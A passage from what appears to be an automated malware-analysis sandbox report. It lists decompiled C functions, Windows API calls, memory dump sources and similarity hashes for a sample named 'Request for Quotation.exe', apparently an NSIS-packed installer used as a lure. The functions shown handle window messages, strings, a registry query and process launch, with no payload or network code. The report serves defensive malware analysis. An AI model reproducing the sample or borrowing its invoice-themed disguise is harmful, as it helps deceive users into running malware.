                                                                                • Instruction Fuzzy Hash: 9111B7736041282BDB00656D9C42FAE3298DB85374F25027BFA26F71D1EA79DC2242ED
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00401C2E, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 59%
                                                                                			E00401C2E(intOrPtr __edx) {
				int _t29;
				long _t30;
				signed int _t32;
				CHAR* _t35;
				long _t36;
				int _t41;
				signed int _t42;
				int _t46;
				int _t56;
				intOrPtr _t57;
				struct HWND__* _t61;
				void* _t64;

				_t57 = __edx;
				_t29 = E00402BAC(3);
				 *((intOrPtr*)(_t64 - 0x38)) = _t57;
				 *(_t64 - 8) = _t29;
				_t30 = E00402BAC(4);
				 *((intOrPtr*)(_t64 - 0x38)) = _t57;
				 *(_t64 + 8) = _t30;
				if(( *(_t64 - 0x14) & 0x00000001) != 0) {
					 *((intOrPtr*)(__ebp - 8)) = E00402BCE(0x33);
				}
				__eflags =  *(_t64 - 0x14) & 0x00000002;
				if(( *(_t64 - 0x14) & 0x00000002) != 0) {
					 *(_t64 + 8) = E00402BCE(0x44);
				}
				__eflags =  *((intOrPtr*)(_t64 - 0x2c)) - 0x21;
				_push(1);
				if(__eflags != 0) {
					_t59 = E00402BCE();
					_t32 = E00402BCE();
					asm("sbb ecx, ecx");
					asm("sbb eax, eax");
					_t35 =  ~( *_t31) & _t59;
					__eflags = _t35;
					_t36 = FindWindowExA( *(_t64 - 8),  *(_t64 + 8), _t35,  ~( *_t32) & _t32);
					goto L10;
				} else {
					_t61 = E00402BAC();
					 *((intOrPtr*)(_t64 - 0x38)) = _t57;
					_t41 = E00402BAC(2);
					 *((intOrPtr*)(_t64 - 0x38)) = _t57;
					_t56 =  *(_t64 - 0x14) >> 2;
					if(__eflags == 0) {
						_t36 = SendMessageA(_t61, _t41,  *(_t64 - 8),  *(_t64 + 8));
						L10:
						 *(_t64 - 0xc) = _t36;
					} else {
						_t42 = SendMessageTimeoutA(_t61, _t41,  *(_t64 - 8),  *(_t64 + 8), _t46, _t56, _t64 - 0xc);
						asm("sbb eax, eax");
						 *((intOrPtr*)(_t64 - 4)) =  ~_t42 + 1;
					}
				}
				__eflags =  *((intOrPtr*)(_t64 - 0x28)) - _t46;
				if( *((intOrPtr*)(_t64 - 0x28)) >= _t46) {
					_push( *(_t64 - 0xc));
					E004061AB();
				}
				 *0x42f4e8 =  *0x42f4e8 +  *((intOrPtr*)(_t64 - 4));
				return 0;
			}















                                                                                0x00401c2e
                                                                                0x00401c30
                                                                                0x00401c37
                                                                                0x00401c3a
                                                                                0x00401c3d
                                                                                0x00401c47
                                                                                0x00401c4b
                                                                                0x00401c4e
                                                                                0x00401c57
                                                                                0x00401c57
                                                                                0x00401c5a
                                                                                0x00401c5e
                                                                                0x00401c67
                                                                                0x00401c67
                                                                                0x00401c6a
                                                                                0x00401c6e
                                                                                0x00401c70
                                                                                0x00401cc5
                                                                                0x00401cc7
                                                                                0x00401cd0
                                                                                0x00401cd8
                                                                                0x00401cdb
                                                                                0x00401cdb
                                                                                0x00401ce4
                                                                                0x00000000
                                                                                0x00401c72
                                                                                0x00401c79
                                                                                0x00401c7b
                                                                                0x00401c7e
                                                                                0x00401c84
                                                                                0x00401c8b
                                                                                0x00401c8e
                                                                                0x00401cb6
                                                                                0x00401cea
                                                                                0x00401cea
                                                                                0x00401c90
                                                                                0x00401c9e
                                                                                0x00401ca6
                                                                                0x00401ca9
                                                                                0x00401ca9
                                                                                0x00401c8e
                                                                                0x00401ced
                                                                                0x00401cf0
                                                                                0x00401cf6
                                                                                0x004029a5
                                                                                0x004029a5
                                                                                0x00402a5d
                                                                                0x00402a69

                                                                                APIs
                                                                                • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C9E
                                                                                • SendMessageA.USER32(00000000,00000000,?,?), ref: 00401CB6
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.642351925.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.642341918.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642363195.0000000000408000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642372741.000000000040A000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642405848.000000000041D000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642426353.000000000042C000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642443972.0000000000435000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642456295.0000000000438000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: MessageSend$Timeout
                                                                                • String ID: !
                                                                                • API String ID: 1777923405-2657877971
                                                                                • Opcode ID: 7f513ab6a3ebb62765d7b61154200c887099e4f9fcc296ff57337de7f7cd59e8
                                                                                • Instruction ID: c2b49ebb6df65f965b847d27db55c839bb0ece9d55d01ae65463d35699866107
                                                                                • Opcode Fuzzy Hash: 7f513ab6a3ebb62765d7b61154200c887099e4f9fcc296ff57337de7f7cd59e8
                                                                                • Instruction Fuzzy Hash: 1B215E71A44208BEEB05AFB5D98AAAD7FB5EF44304F20447EF502B61D1D6B88541DB28
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00405BE5, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E00405BE5(CHAR* _a4) {
				CHAR* _t7;

				_t7 = _a4;
				if( *(CharPrevA(_t7,  &(_t7[lstrlenA(_t7)]))) != 0x5c) {
					lstrcatA(_t7, 0x40a014);
				}
				return _t7;
			}




                                                                                0x00405be6
                                                                                0x00405bfd
                                                                                0x00405c05
                                                                                0x00405c05
                                                                                0x00405c0d

                                                                                APIs
                                                                                • lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403473,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403698,?,00000007,00000009,0000000B), ref: 00405BEB
                                                                                • CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403473,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403698,?,00000007,00000009,0000000B), ref: 00405BF4
                                                                                • lstrcatA.KERNEL32(?,0040A014,?,00000007,00000009,0000000B), ref: 00405C05
                                                                                Strings
                                                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 00405BE5
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.642351925.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.642341918.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642363195.0000000000408000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642372741.000000000040A000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642405848.000000000041D000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642426353.000000000042C000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642443972.0000000000435000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642456295.0000000000438000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: CharPrevlstrcatlstrlen
                                                                                • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                • API String ID: 2659869361-3081826266
                                                                                • Opcode ID: 7e3bd0a74015a4b4c7bd8f32b9337ec82444728bd267b6e5413a6877d2367a50
                                                                                • Instruction ID: 4aa12e920610aceb8e029670fdf9df43119f1a02786e7ce54b96f7a39d5643bc
                                                                                • Opcode Fuzzy Hash: 7e3bd0a74015a4b4c7bd8f32b9337ec82444728bd267b6e5413a6877d2367a50
                                                                                • Instruction Fuzzy Hash: E3D0A762A09630BAD20136655C09DCB19088F12701B05006BF101B2191C73C4C5147FD
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0040396E, Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 20COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E0040396E() {
				void* _t1;
				void* _t2;
				signed int _t11;

				_t1 =  *0x40a018; // 0x2cc
				if(_t1 != 0xffffffff) {
					CloseHandle(_t1);
					 *0x40a018 =  *0x40a018 | 0xffffffff;
				}
				_t2 =  *0x40a01c; // 0x2d0
				if(_t2 != 0xffffffff) {
					CloseHandle(_t2);
					 *0x40a01c =  *0x40a01c | 0xffffffff;
					_t11 =  *0x40a01c;
				}
				E004039CB();
				return E00405A15(_t11, "C:\\Users\\jones\\AppData\\Local\\Temp\\nsc77A8.tmp", 7);
			}






                                                                                0x0040396e
                                                                                0x0040397d
                                                                                0x00403980
                                                                                0x00403982
                                                                                0x00403982
                                                                                0x00403989
                                                                                0x00403991
                                                                                0x00403994
                                                                                0x00403996
                                                                                0x00403996
                                                                                0x00403996
                                                                                0x0040399d
                                                                                0x004039af

                                                                                APIs
                                                                                • CloseHandle.KERNEL32(000002CC,C:\Users\user\AppData\Local\Temp\,004037A5,?,?,00000007,00000009,0000000B), ref: 00403980
                                                                                • CloseHandle.KERNEL32(000002D0,C:\Users\user\AppData\Local\Temp\,004037A5,?,?,00000007,00000009,0000000B), ref: 00403994
                                                                                Strings
                                                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 00403973
                                                                                • C:\Users\user\AppData\Local\Temp\nsc77A8.tmp, xrefs: 004039A4
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.642351925.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.642341918.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642363195.0000000000408000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642372741.000000000040A000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642405848.000000000041D000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642426353.000000000042C000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642443972.0000000000435000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642456295.0000000000438000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: CloseHandle
                                                                                • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nsc77A8.tmp
                                                                                • API String ID: 2962429428-3018440030
                                                                                • Opcode ID: 9c3bbf5256d3b09d74f88582b30b225da325b648228e2b1124762f0c8a79aaf4
                                                                                • Instruction ID: e02401a4112a94a9765f7fc85388a0ec9ec9dd0d4867be743f4f38008bc29606
                                                                                • Opcode Fuzzy Hash: 9c3bbf5256d3b09d74f88582b30b225da325b648228e2b1124762f0c8a79aaf4
                                                                                • Instruction Fuzzy Hash: 36E08C71910714A6C124AF7CAE8E8853B285B893357208726F078F20F0C7789AA74EAD
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 004052E8, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 89%
                                                                                			E004052E8(struct HWND__* _a4, int _a8, int _a12, long _a16) {
				int _t15;
				long _t16;

				_t15 = _a8;
				if(_t15 != 0x102) {
					if(_t15 != 0x200) {
						_t16 = _a16;
						L7:
						if(_t15 == 0x419 &&  *0x42a8a4 != _t16) {
							_push(_t16);
							_push(6);
							 *0x42a8a4 = _t16;
							E00404CA4();
						}
						L11:
						return CallWindowProcA( *0x42a8ac, _a4, _t15, _a12, _t16);
					}
					if(IsWindowVisible(_a4) == 0) {
						L10:
						_t16 = _a16;
						goto L11;
					}
					_t16 = E00404C24(_a4, 1);
					_t15 = 0x419;
					goto L7;
				}
				if(_a12 != 0x20) {
					goto L10;
				}
				E0040431D(0x413);
				return 0;
			}





                                                                                0x004052ec
                                                                                0x004052f6
                                                                                0x00405312
                                                                                0x00405334
                                                                                0x00405337
                                                                                0x0040533d
                                                                                0x00405347
                                                                                0x00405348
                                                                                0x0040534a
                                                                                0x00405350
                                                                                0x00405350
                                                                                0x0040535a
                                                                                0x00000000
                                                                                0x00405368
                                                                                0x0040531f
                                                                                0x00405357
                                                                                0x00405357
                                                                                0x00000000
                                                                                0x00405357
                                                                                0x0040532b
                                                                                0x0040532d
                                                                                0x00000000
                                                                                0x0040532d
                                                                                0x004052fc
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00405303
                                                                                0x00000000

                                                                                APIs
                                                                                • IsWindowVisible.USER32(?), ref: 00405317
                                                                                • CallWindowProcA.USER32 ref: 00405368
                                                                                  • Part of subcall function 0040431D: SendMessageA.USER32(00000000,00000000,00000000,00000000), ref: 0040432F
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.642351925.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.642341918.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642363195.0000000000408000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642372741.000000000040A000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642405848.000000000041D000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642426353.000000000042C000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642443972.0000000000435000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642456295.0000000000438000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: Window$CallMessageProcSendVisible
                                                                                • String ID:
                                                                                • API String ID: 3748168415-3916222277
                                                                                • Opcode ID: 0a098fed05280c4c25b3dc975a767402e9790e492dc4fcfe2bcc4ad60f2532f9
                                                                                • Instruction ID: 61c005e653dc5e4fe91c717b668e6c159ed787b7c92b66bd7724375ff0c78d11
                                                                                • Opcode Fuzzy Hash: 0a098fed05280c4c25b3dc975a767402e9790e492dc4fcfe2bcc4ad60f2532f9
                                                                                • Instruction Fuzzy Hash: B5018471200608EFDF206F11DD80AAB3765EB84795F185137FE047A1D1C7BA8C629E2E
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00406134, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44registryCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 90%
                                                                                			E00406134(void* __ecx, void* __eflags, intOrPtr _a4, int _a8, char* _a12, char* _a16, signed int _a20) {
				int _v8;
				long _t21;
				long _t24;
				char* _t30;

				asm("sbb eax, eax");
				_v8 = 0x400;
				_t21 = E004060D3(__eflags, _a4, _a8,  ~_a20 & 0x00000100 | 0x00020019,  &_a20);
				_t30 = _a16;
				if(_t21 != 0) {
					L4:
					 *_t30 =  *_t30 & 0x00000000;
				} else {
					_t24 = RegQueryValueExA(_a20, _a12, 0,  &_a8, _t30,  &_v8);
					_t21 = RegCloseKey(_a20);
					_t30[0x3ff] = _t30[0x3ff] & 0x00000000;
					if(_t24 != 0 || _a8 != 1 && _a8 != 2) {
						goto L4;
					}
				}
				return _t21;
			}







                                                                                0x00406142
                                                                                0x00406144
                                                                                0x0040615c
                                                                                0x00406161
                                                                                0x00406166
                                                                                0x004061a3
                                                                                0x004061a3
                                                                                0x00406168
                                                                                0x0040617a
                                                                                0x00406185
                                                                                0x0040618b
                                                                                0x00406195
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00406195
                                                                                0x004061a8

                                                                                APIs
                                                                                • RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,00000400,Call,0042A098,?,?,?,00000002,Call,?,004063E9,80000002), ref: 0040617A
                                                                                • RegCloseKey.ADVAPI32(?,?,004063E9,80000002,Software\Microsoft\Windows\CurrentVersion,Call,Call,Call,?,0042A098), ref: 00406185
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.642351925.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.642341918.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642363195.0000000000408000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642372741.000000000040A000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642405848.000000000041D000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642426353.000000000042C000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642443972.0000000000435000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642456295.0000000000438000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: CloseQueryValue
                                                                                • String ID: Call
                                                                                • API String ID: 3356406503-1824292864
                                                                                • Opcode ID: 2abccbe21afdcf7b2969046f12d50590a05fc3777738c5024e31ebbb51756706
                                                                                • Instruction ID: abb308f8f7f3d79eba5fb0d9b58611e130e20d6dfe1a02acdbc1ca07f32112a5
                                                                                • Opcode Fuzzy Hash: 2abccbe21afdcf7b2969046f12d50590a05fc3777738c5024e31ebbb51756706
                                                                                • Instruction Fuzzy Hash: CA01BC72500209ABEF22CF60CD09FDB3FA8EF45364F01403AF916E6191D278C964CBA4
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 004058EC, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E004058EC(CHAR* _a4) {
				struct _PROCESS_INFORMATION _v20;
				int _t7;

				0x42c0c0->cb = 0x44;
				_t7 = CreateProcessA(0, _a4, 0, 0, 0, 0x4000000, 0, 0, 0x42c0c0,  &_v20);
				if(_t7 != 0) {
					CloseHandle(_v20.hThread);
					return _v20.hProcess;
				}
				return _t7;
			}





                                                                                0x004058f5
                                                                                0x00405915
                                                                                0x0040591d
                                                                                0x00405922
                                                                                0x00000000
                                                                                0x00405928
                                                                                0x0040592c

                                                                                APIs
                                                                                • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,0042C0C0,Error launching installer), ref: 00405915
                                                                                • CloseHandle.KERNEL32(?), ref: 00405922
                                                                                Strings
                                                                                • Error launching installer, xrefs: 004058FF
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.642351925.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.642341918.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642363195.0000000000408000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642372741.000000000040A000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642405848.000000000041D000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642426353.000000000042C000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642443972.0000000000435000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642456295.0000000000438000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: CloseCreateHandleProcess
                                                                                • String ID: Error launching installer
                                                                                • API String ID: 3712363035-66219284
                                                                                • Opcode ID: a7bb890bbc051f912148fc8d3d355e884b0c5c28e790f435a07fb0e3f2a9ef73
                                                                                • Instruction ID: c507ec532ebc7345b5619acd619b8ed9e71e93050b60d9e59510cdc0b01a46da
                                                                                • Opcode Fuzzy Hash: a7bb890bbc051f912148fc8d3d355e884b0c5c28e790f435a07fb0e3f2a9ef73
                                                                                • Instruction Fuzzy Hash: 52E0BFF5600209BFEB109BA5ED45F7F77ADFB04608F404525BD50F2150D77499158A78
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00405C2C, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E00405C2C(char* _a4) {
				char* _t3;
				char* _t5;

				_t5 = _a4;
				_t3 =  &(_t5[lstrlenA(_t5)]);
				while( *_t3 != 0x5c) {
					_t3 = CharPrevA(_t5, _t3);
					if(_t3 > _t5) {
						continue;
					}
					break;
				}
				 *_t3 =  *_t3 & 0x00000000;
				return  &(_t3[1]);
			}





                                                                                0x00405c2d
                                                                                0x00405c37
                                                                                0x00405c39
                                                                                0x00405c40
                                                                                0x00405c48
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00405c48
                                                                                0x00405c4a
                                                                                0x00405c4f

                                                                                APIs
                                                                                • lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402F5D,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Request for Quotation.exe,C:\Users\user\Desktop\Request for Quotation.exe,80000000,00000003), ref: 00405C32
                                                                                • CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402F5D,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Request for Quotation.exe,C:\Users\user\Desktop\Request for Quotation.exe,80000000,00000003), ref: 00405C40
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.642351925.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.642341918.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642363195.0000000000408000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642372741.000000000040A000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642405848.000000000041D000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642426353.000000000042C000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642443972.0000000000435000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642456295.0000000000438000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: CharPrevlstrlen
                                                                                • String ID: C:\Users\user\Desktop
                                                                                • API String ID: 2709904686-224404859
                                                                                • Opcode ID: 7cfe4fb9fb084f73e38b743788eacbc948a8cb50b3ca3a16f7beb83d38b7a1d7
                                                                                • Instruction ID: 4ba3b1558e7d02da59ab85be258a456d7b40e7fb12288d653d4debc9d62610ac
                                                                                • Opcode Fuzzy Hash: 7cfe4fb9fb084f73e38b743788eacbc948a8cb50b3ca3a16f7beb83d38b7a1d7
                                                                                • Instruction Fuzzy Hash: 2FD0A76240CA706EF30366108C00B8F6A48DF13301F0900A6F081A2190C3BC4C424BFD
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 6F7110E0, Relevance: 5.1, APIs: 4, Instructions: 102memoryCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E6F7110E0(void* _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				char* _t17;
				char _t19;
				void* _t20;
				void* _t24;
				void* _t27;
				void* _t31;
				void* _t37;
				void* _t39;
				void* _t40;
				signed int _t43;
				void* _t52;
				char* _t53;
				char* _t55;
				void* _t56;
				void* _t58;

				 *0x6f71405c = _a8;
				 *0x6f714060 = _a16;
				 *0x6f714064 = _a12;
				 *((intOrPtr*)(_a20 + 0xc))( *0x6f714038, E6F711556, _t52);
				_t43 =  *0x6f71405c +  *0x6f71405c * 4 << 2;
				_t17 = E6F71123B();
				_a8 = _t17;
				_t53 = _t17;
				if( *_t17 == 0) {
					L16:
					return GlobalFree(_a8);
				} else {
					do {
						_t19 =  *_t53;
						_t55 = _t53 + 1;
						_t58 = _t19 - 0x6c;
						if(_t58 > 0) {
							_t20 = _t19 - 0x70;
							if(_t20 == 0) {
								L12:
								_t53 = _t55 + 1;
								_t24 = E6F711266(E6F7112AD( *_t55 - 0x30));
								L13:
								GlobalFree(_t24);
								goto L14;
							}
							_t27 = _t20;
							if(_t27 == 0) {
								L10:
								_t53 = _t55 + 1;
								_t24 = E6F7112D1( *_t55 - 0x30, E6F71123B());
								goto L13;
							}
							L7:
							if(_t27 == 1) {
								_t31 = GlobalAlloc(0x40, _t43 + 4);
								 *_t31 =  *0x6f714030;
								 *0x6f714030 = _t31;
								E6F711508(_t31 + 4,  *0x6f714064, _t43);
								_t56 = _t56 + 0xc;
							}
							goto L14;
						}
						if(_t58 == 0) {
							L17:
							_t34 =  *0x6f714030;
							if( *0x6f714030 != 0) {
								E6F711508( *0x6f714064, _t34 + 4, _t43);
								_t37 =  *0x6f714030;
								_t56 = _t56 + 0xc;
								GlobalFree(_t37);
								 *0x6f714030 =  *_t37;
							}
							goto L14;
						}
						_t39 = _t19 - 0x4c;
						if(_t39 == 0) {
							goto L17;
						}
						_t40 = _t39 - 4;
						if(_t40 == 0) {
							 *_t55 =  *_t55 + 0xa;
							goto L12;
						}
						_t27 = _t40;
						if(_t27 == 0) {
							 *_t55 =  *_t55 + 0xa;
							goto L10;
						}
						goto L7;
						L14:
					} while ( *_t53 != 0);
					goto L16;
				}
			}


















                                                                                0x6f7110e7
                                                                                0x6f7110ef
                                                                                0x6f711103
                                                                                0x6f71110b
                                                                                0x6f711116
                                                                                0x6f711119
                                                                                0x6f711121
                                                                                0x6f711124
                                                                                0x6f711126
                                                                                0x6f7111c4
                                                                                0x6f7111d0
                                                                                0x6f71112c
                                                                                0x6f71112d
                                                                                0x6f71112d
                                                                                0x6f711130
                                                                                0x6f711131
                                                                                0x6f711134
                                                                                0x6f711203
                                                                                0x6f711206
                                                                                0x6f71119e
                                                                                0x6f7111a4
                                                                                0x6f7111ac
                                                                                0x6f7111b1
                                                                                0x6f7111b4
                                                                                0x00000000
                                                                                0x6f7111b4
                                                                                0x6f711209
                                                                                0x6f71120a
                                                                                0x6f711186
                                                                                0x6f71118c
                                                                                0x6f711194
                                                                                0x00000000
                                                                                0x6f711194
                                                                                0x6f711152
                                                                                0x6f711153
                                                                                0x6f71115b
                                                                                0x6f711168
                                                                                0x6f711170
                                                                                0x6f711179
                                                                                0x6f71117e
                                                                                0x6f71117e
                                                                                0x00000000
                                                                                0x6f711153
                                                                                0x6f71113a
                                                                                0x6f7111d1
                                                                                0x6f7111d1
                                                                                0x6f7111d8
                                                                                0x6f7111e5
                                                                                0x6f7111ea
                                                                                0x6f7111ef
                                                                                0x6f7111f5
                                                                                0x6f7111fb
                                                                                0x6f7111fb
                                                                                0x00000000
                                                                                0x6f7111d8
                                                                                0x6f711140
                                                                                0x6f711143
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x6f711149
                                                                                0x6f71114c
                                                                                0x6f71119b
                                                                                0x00000000
                                                                                0x6f71119b
                                                                                0x6f71114f
                                                                                0x6f711150
                                                                                0x6f711183
                                                                                0x00000000
                                                                                0x6f711183
                                                                                0x00000000
                                                                                0x6f7111ba
                                                                                0x6f7111ba
                                                                                0x00000000
                                                                                0x6f7111c3

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.644261390.000000006F711000.00000020.00020000.sdmp, Offset: 6F710000, based on PE: true
                                                                                • Associated: 00000000.00000002.644238585.000000006F710000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.644270262.000000006F713000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.644290951.000000006F715000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: Global$Free$Alloc
                                                                                • String ID:
                                                                                • API String ID: 1780285237-0
                                                                                • Opcode ID: fb6216d9d71e89c6e998fad362c17edcdc565aae6eaabbc827570bfb964dd2ee
                                                                                • Instruction ID: 2b6d16b6eecbd24920398a46619779e380065eabaa6d80e36ad13868d84f47a2
                                                                                • Opcode Fuzzy Hash: fb6216d9d71e89c6e998fad362c17edcdc565aae6eaabbc827570bfb964dd2ee
                                                                                • Instruction Fuzzy Hash: 1B319EB150C644AFEB00CF69EB4AA65BFFDFB57264B1C0177E844CA150D7B49918AB20
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00405D4B, Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E00405D4B(void* __ecx, CHAR* _a4, CHAR* _a8) {
				int _v8;
				int _t12;
				int _t14;
				int _t15;
				CHAR* _t17;
				CHAR* _t27;

				_t12 = lstrlenA(_a8);
				_t27 = _a4;
				_v8 = _t12;
				while(lstrlenA(_t27) >= _v8) {
					_t14 = _v8;
					 *(_t14 + _t27) =  *(_t14 + _t27) & 0x00000000;
					_t15 = lstrcmpiA(_t27, _a8);
					_t27[_v8] =  *(_t14 + _t27);
					if(_t15 == 0) {
						_t17 = _t27;
					} else {
						_t27 = CharNextA(_t27);
						continue;
					}
					L5:
					return _t17;
				}
				_t17 = 0;
				goto L5;
			}









                                                                                0x00405d5b
                                                                                0x00405d5d
                                                                                0x00405d60
                                                                                0x00405d8c
                                                                                0x00405d65
                                                                                0x00405d6e
                                                                                0x00405d73
                                                                                0x00405d7e
                                                                                0x00405d81
                                                                                0x00405d9d
                                                                                0x00405d83
                                                                                0x00405d8a
                                                                                0x00000000
                                                                                0x00405d8a
                                                                                0x00405d96
                                                                                0x00405d9a
                                                                                0x00405d9a
                                                                                0x00405d94
                                                                                0x00000000

                                                                                APIs
